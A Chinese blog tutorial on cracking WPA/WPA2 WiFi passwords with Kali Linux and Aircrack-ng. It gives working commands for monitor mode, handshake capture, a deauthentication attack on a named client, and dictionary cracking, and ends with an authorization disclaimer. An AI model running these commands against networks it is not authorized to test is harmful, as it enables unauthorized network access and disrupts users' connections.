无线网卡+kali实现wifi暴力破解(密码爆破方式)

本文介绍如何在Kali Linux环境下使用D-LINK无线网卡及Aircrack-ng工具进行无线网络的安全测试过程,包括开启监听、扫描WiFi、破解密码等步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

攻击机:kali

所采用的的无线网卡:D-LINK

采用的工具:Aircrack-ng

测试开始:

首先,打开kali,将无线网卡插入。弹出提示窗口,这里选择连接到虚拟机,选择kali虚拟机。

然后点击网络连接的标志,可以看到当前环境的wifi列表。

使用命令ifconfig和iwconfig,都可以看到wlan0已开启。

现在开始爆破。

这里的字典是我自己常用的,大家可以自行寻找字典。

(1)清除进程:airmon-ng check kall

(2)开启监听:airmon-ng start wlan0

可以看到已成功开启监听的进程。

再查看网卡状态。发现是wlan0mon,表示已进入监听状态

 

(3)开始扫描wifi,airodump-ng wlan0mon

  • BSSID:路由器的MAC地址

  • PWR:信号值,绝对值越低,说明信号越强

  • CH:当前路由器使用的信道

扫描出来了,这里选择PWR的绝对值小的,绝对值越小信号越高,这里都是负值,所以选择负值越最大的。

扫描的时候可能没法复制,大家选好要用的目标后,ctrl+c结束扫描,然后复制bssid。

我选择 这个-38的。

(4)开始监听该wifi:

airodump-ng --bssid CC:34:29:95:A5:4A -c 8 -w text wlan0mon

--bssid 后输入wifi的bssid

-c 后输入wifi 的信道值ch

-w 后是自己命名的监听到的握手包的名字,自己定义即可

(5)选择一个目标进行攻击,依次拿到握手包。这里的原理大家自行百度一下。

aireplay-ng -0 10 -a CC:34:29:95:A5:4A -c 50:2F:9B:14:86:0B wlan0mon

-0:制定攻击次数。

-a:路由器的bssid值

-c:目标mac地址

看到攻击成功。

 

(6)开始爆破密码:

aircrack-ng -a2 -b CC:34:29:95:A5:4A -w /usr/share/seclists/wifi_top2000_passwd.txt text-01.cap

-a2 代表WPA的握手包
-b 指定要破解的wifi的BSSID
-w 指定字典文件

字典后接我们监听抓到的cap包

‘’

 这里是我日常家用的wifi所以字典很快就刨出来了。大家可以自行加强字典强度。

 

 

 

 

 

### 使用 Kali Linux 进行 WiFi 密码爆破 #### 工具准备 为了进行 WiFi,需要准备好必要的工具和环境。Kali Linux 是一款专门为渗透测试设计的操作系统,内置了许多安全审计工具。 - **网络适配器**:确保使用的无线网卡支持监控模式和数据包注入功能。 - **密码字典**:用于暴力破解密码列表文件,如 `pass.txt` 或者其他自定义词表[^1]。 #### 启动监听并捕获握手包 进入终端命令行界面,通过以下指令来设置无线网卡工作于监测状态: ```bash airmon-ng start wlan0 airodump-ng wlan0mon ``` 当找到目标 AP (Access Point) 后记录下其 BSSID 和信道信息,在新窗口执行更精确的数据抓取操作: ```bash airodump-ng --bssid [BSSID] -c [Channel] -w output_file wlan0mon ``` 此时可以等待客户端自然断开重连获取 handshake;也可以主动发起去认证攻击加快过程: ```bash aireplay-ng --deauth 10 -a [BSSID] -c [Client_MAC_Address] wlan0mon ``` 上述命令会向指定接入点广播多个除身份验证帧给特定客户机,迫使其重新登录从而产生所需的四次握手消息[^2]。 #### 开始暴力破解 一旦获得了包含有效 WPA/WPA2 四路握手的消息 `.cap` 文件,则可利用 Aircrack-ng 来尝试恢复预共享密钥(PSK): ```bash aircrack-ng -w /path/to/password_list.txt -b [Target_BSSID] capture-file.cap ``` 这里 `-w` 参数指定了用来猜测 PSK 的单词表路径,而 `-b` 则限定了要针对哪个 SSID/BSSID 对应的手握包来进行分析处理[^3]。 请注意这种行为仅适用于合法授权下的安全性评估活动之中,并严格遵守法律法规以及道德准则!
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

大西瓜的安全之路

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值